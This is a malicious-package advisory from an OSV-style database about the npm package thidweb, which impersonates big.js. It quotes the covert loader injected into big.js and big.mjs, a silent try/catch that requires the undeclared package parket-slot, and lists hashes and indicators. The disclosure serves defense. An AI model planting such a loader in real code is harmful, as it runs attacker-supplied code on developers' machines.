MAL-2026-6343

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/thidweb/MAL-2026-6343.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6343
Published
2026-06-23T20:01:26Z
Modified
2026-06-23T21:01:21.969570772Z
Summary
Malicious code in thidweb (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (80721058923b3e5963a6ee170007b8b4131ae5093481456ca10e63f52963987d)

Package is published as thidweb but its README, source comments, repo URL, and author metadata all identify it as big.js v7.0.1 by Mike McLaughlin (README.md line 1 # big.js; big.js header big.js v7.0.1; package.json repository url https://github.com/MikeMcl/big.js.git). The source is a verbatim copy of upstream big.js with a covert loader injected mid-file at big.js:605-609: try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }. The same block is present in big.mjs. parket-slot is not declared in package.json dependencies; the only declared dependency is log-taker@^0.0.9, which upstream big.js does not require (upstream is dependency-free). Any developer who installs thidweb (mistaking it for big.js) and imports it executes whatever code parket-slot ships, with errors silently swallowed. The combination of impersonation, undeclared runtime require, error-suppressing try/catch, and an unrelated declared dependency is a multi-stage installer-side code-execution attack.

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "80721058923b3e5963a6ee170007b8b4131ae5093481456ca10e63f52963987d",
            "source": "amazon-inspector",
            "import_time": "2026-06-23T20:48:30.715119057Z",
            "id": "IN-MAL-2026-007356",
            "versions": [
                "0.0.8"
            ],
            "modified_time": "2026-06-23T20:01:26Z"
        }
    ]
}

Affected packages

Package: npm / thidweb
Affected ranges: 0.*
Affected versions: 0.0.8

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/thidweb/MAL-2026-6343.json"
indicators
{
    "package_integrity": [
        {
            "filename": "thidweb-0.0.8.tgz",
            "hashes": {
                "sha1": "04e7457d06345536d4bd78c9e0a34e5598ac5ecc",
                "sha512_sri": "sha512-YU0zyLSumbR4vpqZ5emFW3M5I38jX4DtdP/xKPTNoj97robUvHd46iJvHKi5lyJjC77yYBJjtQRtOFmCnmGUXw=="
            }
        }
    ],
    "evidence_files": [
        {
            "tlsh": "24c2658c3ac67579593363788f4a5088eb38525712c8b186b4ae63b46f78cb107b5fdc",
            "sha256": "5b803b2bbd43db704b5802fa5bf4da96e79c3b876d74495116b53a837101dace",
            "path": "big.js"
        },
        {
            "tlsh": "59213463c9a59da70af85ba47c6c03aef1151b1f00a04c17b07b130c4f3345b2096b7d",
            "path": "package.json",
            "sha256": "b45b4819897cf8421385b6cba4fb1ab287a762cc7d979c79041298202d02d7e4"
        }
    ]
}
cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]